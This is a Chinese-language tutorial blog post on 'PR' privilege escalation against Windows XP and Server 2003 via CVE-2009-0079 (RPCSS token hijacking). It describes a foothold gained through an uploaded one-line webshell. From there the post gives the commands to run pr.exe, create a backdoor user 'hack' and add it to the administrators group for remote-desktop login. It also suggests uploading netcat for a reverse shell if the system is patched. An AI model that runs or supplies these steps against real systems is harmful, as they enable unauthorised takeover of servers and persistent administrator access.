Windows PR提权
Windows PR提权
目录
提权利用的漏洞
PR提权
提权利用的漏洞
Microsoft Windows RPCSS服务隔离本地权限提升漏洞
RPCSS服务没有正确地隔离 NetworkService 或 LocalService 帐号下运行的进程,本地攻击者可以利用令牌劫持的方式获得权限提升。成功利用此漏洞的攻击者可以完全控制受影响的系统,攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。
BUGTRAQ ID: 34443
CVE(CAN) ID: CVE-2009-0079
发布日期:2009-04-14
更新日期:2009-04-24
受影响系统:
Microsoft Windows XP x64 SP2
Microsoft Windows XP x64
Microsoft Windows XP SP3
Microsoft Windows XP SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows Server 2003 SP1
也就是说只有Windows Server 2003和windows xp系统能够使用 pr 提权。
PR提权
以下环境,Windows Server 2003
很多时候,当我们上传了一句话木马之后,想要进行一些操作。比如,查看当前用户的身份,这时会发现权限不够,当前的命令行只对网站当前目录下的文件具有操作权限,对其他目录和系统都没有权限,这时我们就需要提权了。
我们把下面两个程序上传到网站目录下去
程序链接:链接: 提取码: unyc
然后执行下面这条命令,把当前终端的执行程序设置成我们上传的 cmd.exe
setp "C:\website\站酷爱装网V2012版\UploadFiles\cmd.exe"
然后我们就可以做我们想做的任何事情了。我们的命令用双引号引住,前面加上 pr.exe
pr.exe "net user hack 123 /add" #新建一个hack用户,密码为 123pr.exe "net localgroup administrators hack /add" #将hack用户加入administrators管理员组
接着,我们就可以用远程桌面登录了,前提是目标主机开启了3389远程端口
但是,如果目标机打上了 KB952004补丁 的话,是没有办法使用pr进行提权的。
这时,我们可以尝试上传nc,反弹 c:\windows\system32\cmd.exe 。
相关文章:Netcat瑞士军刀的简单使用
UDF提权
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~